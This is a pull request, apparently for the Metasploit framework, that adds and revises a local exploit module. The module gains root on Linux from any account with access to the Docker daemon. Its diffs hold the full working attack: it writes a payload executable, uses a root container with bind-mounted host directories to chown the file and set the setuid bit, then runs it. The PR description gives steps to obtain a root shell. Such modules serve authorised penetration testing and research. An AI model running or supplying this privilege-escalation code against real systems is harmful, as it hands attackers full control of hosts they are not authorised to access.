### PR TITLE
Add privilege escalation for host users that can access the docker daemon

### DIFF
--- a/modules/exploits/linux/local/docker_daemon_privilege_escalation.rb
+++ b/modules/exploits/linux/local/docker_daemon_privilege_escalation.rb
@@ -49,8 +49,8 @@ class MetasploitModule < Msf::Exploit::Local
     print_status("Writing payload executable to '#{exe_file}'")
     write_file(exe_file, pl)
     cmd_exec("chmod +x #{exe_file}")
-    print_status shell_script(exe_file)
-    print_status cmd_exec("sh -c '#{shell_script(exe_file)}'")
+    vprint_status shell_script(exe_file)
+    vprint_status cmd_exec("sh -c '#{shell_script(exe_file)}'")
 
     stime = Time.now.to_f
     print_status "Starting the payload handler..."

--- a/modules/exploits/linux/local/docker_daemon_privilege_escalation.rb
+++ b/modules/exploits/linux/local/docker_daemon_privilege_escalation.rb
@@ -36,7 +36,7 @@ class MetasploitModule < Msf::Exploit::Local
 
   def check
     if cmd_exec("sh -c 'docker ps; echo $?'").strip =~ /1$/
-      print_warning("Failed to access Docker daemon.")
+      print_error("Failed to access Docker daemon.")
       Exploit::CheckCode::Safe
     else
       Exploit::CheckCode::Vulnerable

--- a/modules/exploits/linux/local/docker_daemon_privilege_escalation.rb
+++ b/modules/exploits/linux/local/docker_daemon_privilege_escalation.rb
@@ -1,0 +1,75 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rex'
+require 'msf/core/exploit/exe'
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+  include Msf::Exploit::EXE
+  include Msf::Post::File
+
+  def initialize(info={})
+    super(update_info(info, {
+      'Name'          => 'Docker Daemon Privilege Escalation',
+      'Description'   => %q{
+        This module obtains root privileges from any host account with access to the
+        Docker daemon. Usually this includes accounts in the `docker` group.
+      },
+      'License'       => MSF_LICENSE,
+      'Author'        => ['forzoni'],
+      'DisclosureDate' => 'Jun 28 2016',
+      'Platform'      => 'linux',
+      'Arch'          => [ARCH_X86, ARCH_X86_64],
+      'Targets'       => [ ['Automatic', {}] ],
+      'SessionTypes'  => ['shell', 'meterpreter']
+      }
+    ))
+    register_options([
+      OptInt.new("ListenerTimeout", [true, "Number of seconds to wait for the exploit", 60]),
+      OptString.new("WritableDir", [true, "A directory where we can write files", "/tmp"])
+    ], self.class)
+  end
+
+  def check
+    if cmd_exec("sh -c 'docker ps; echo $?'").strip =~ /1$/
+      print_warning("Failed to access Docker daemon.")
+      Exploit::CheckCode::Safe
+    else
+      Exploit::CheckCode::Vulnerable
+    end
+  end
+
+  def exploit
+    pl = generate_payload_exe
+    exe_file = "#{datastore['WritableDir']}/#{rand_text_alpha(3 + rand(5))}.elf"
+    print_status("Writing payload executable to '#{exe_file}'")
+    write_file(exe_file, pl)
+    cmd_exec("chmod +x #{exe_file}")
+    print_status shell_script(exe_file)
+    print_status cmd_exec("sh -c '#{shell_script(exe_file)}'")
+
+    stime = Time.now.to_f
+    print_status "Starting the payload handler..."
+    until session_created? || stime + datastore['ListenerTimeout'] < Time.now.to_f
+      Rex.sleep(1)
+    end
+  end
+
+  def shell_script(exploit_path)
+    deps = %w(/bin /lib /lib64 /etc /usr /opt) + [datastore['WritableDir']]
+    dep_options = deps.uniq.map { |dep| "-v #{dep}:#{dep}" }.join(" ")
+    %Q{
+      IMG=`echo "FROM scratch\\nCMD a" | docker build -q - | cut -d ":" -f2`
+      EXPLOIT="chown 0:0 #{exploit_path}; chmod u+s #{exploit_path}"
+      docker run #{dep_options} $IMG /bin/bash -c "$EXPLOIT"
+      docker rmi $IMG
+      #{exploit_path}
+    }.strip.split("\n").map(&:strip).join(';')
+  end
+
+end
+

--- a/modules/exploits/linux/local/docker_daemon_privilege_escalation.rb
+++ b/modules/exploits/linux/local/docker_daemon_privilege_escalation.rb
@@ -11,6 +11,7 @@ class MetasploitModule < Msf::Exploit::Local
   Rank = ExcellentRanking
   include Msf::Exploit::EXE
   include Msf::Post::File
+  include Msf::Exploit::FileDropper
 
   def initialize(info={})
     super(update_info(info, {
@@ -23,12 +24,13 @@ class MetasploitModule < Msf::Exploit::Local
       'Author'        => ['forzoni'],
       'DisclosureDate' => 'Jun 28 2016',
       'Platform'      => 'linux',
-      'Arch'          => [ARCH_X86, ARCH_X86_64],
+      'Arch'          => [ARCH_X86, ARCH_X86_64, ARCH_ARMLE, ARCH_MIPSLE, ARCH_MIPSBE],
       'Targets'       => [ ['Automatic', {}] ],
+      'DefaultOptions' => { 'PrependFork' => true },
       'SessionTypes'  => ['shell', 'meterpreter']
       }
     ))
-    register_options([
+    register_advanced_options([
       OptInt.new("ListenerTimeout", [true, "Number of seconds to wait for the exploit", 60]),
       OptString.new("WritableDir", [true, "A directory where we can write files", "/tmp"])
     ], self.class)
@@ -45,15 +47,19 @@ class MetasploitModule < Msf::Exploit::Local
 
   def exploit
     pl = generate_payload_exe
-    exe_file = "#{datastore['WritableDir']}/#{rand_text_alpha(3 + rand(5))}.elf"
-    print_status("Writing payload executable to '#{exe_file}'")
-    write_file(exe_file, pl)
-    cmd_exec("chmod +x #{exe_file}")
-    vprint_status shell_script(exe_file)
-    vprint_status cmd_exec("sh -c '#{shell_script(exe_file)}'")
+    exe_path = "#{datastore['WritableDir']}/#{rand_text_alpha(6 + rand(5))}"
+    print_status("Writing payload executable to '#{exe_path}'")
+
+    write_file(exe_path, pl)
+    register_file_for_cleanup(exe_path)
+
+    print_status("Executing script to create and run docker container")
+    vprint_status cmd_exec("chmod +x #{exe_path}")
+    vprint_status shell_script(exe_path)
+    vprint_status cmd_exec("sh -c '#{shell_script(exe_path)}'")
 
     stime = Time.now.to_f
-    print_status "Starting the payload handler..."
+    print_status "Waiting for payload"
     until session_created? || stime + datastore['ListenerTimeout'] < Time.now.to_f
       Rex.sleep(1)
     end
@@ -62,11 +68,12 @@ class MetasploitModule < Msf::Exploit::Local
   def shell_script(exploit_path)
     deps = %w(/bin /lib /lib64 /etc /usr /opt) + [datastore['WritableDir']]
     dep_options = deps.uniq.map { |dep| "-v #{dep}:#{dep}" }.join(" ")
+
     %Q{
-      IMG=`echo "FROM scratch\\nCMD a" | docker build -q - | cut -d ":" -f2`
+      IMG=`(echo "FROM scratch"; echo "CMD a") | docker build -q - | cut -d ":" -f2`
       EXPLOIT="chown 0:0 #{exploit_path}; chmod u+s #{exploit_path}"
       docker run #{dep_options} $IMG /bin/sh -c "$EXPLOIT"
-      docker rmi $IMG
+      docker rmi -f $IMG
       #{exploit_path}
     }.strip.split("\n").map(&:strip).join(';')
   end

--- a/modules/exploits/linux/local/docker_daemon_privilege_escalation.rb
+++ b/modules/exploits/linux/local/docker_daemon_privilege_escalation.rb
@@ -65,7 +65,7 @@ class MetasploitModule < Msf::Exploit::Local
     %Q{
       IMG=`echo "FROM scratch\\nCMD a" | docker build -q - | cut -d ":" -f2`
       EXPLOIT="chown 0:0 #{exploit_path}; chmod u+s #{exploit_path}"
-      docker run #{dep_options} $IMG /bin/bash -c "$EXPLOIT"
+      docker run #{dep_options} $IMG /bin/sh -c "$EXPLOIT"
       docker rmi $IMG
       #{exploit_path}
     }.strip.split("\n").map(&:strip).join(';')


### PR DESCRIPTION
Escalates to root from a user shell that has access to the docker daemon.
- [x] Install Docker, add `user` to the group `docker` so it can access the daemon
- [x] Get a shell as `user`
- [x] Run this module, you should get a root shell
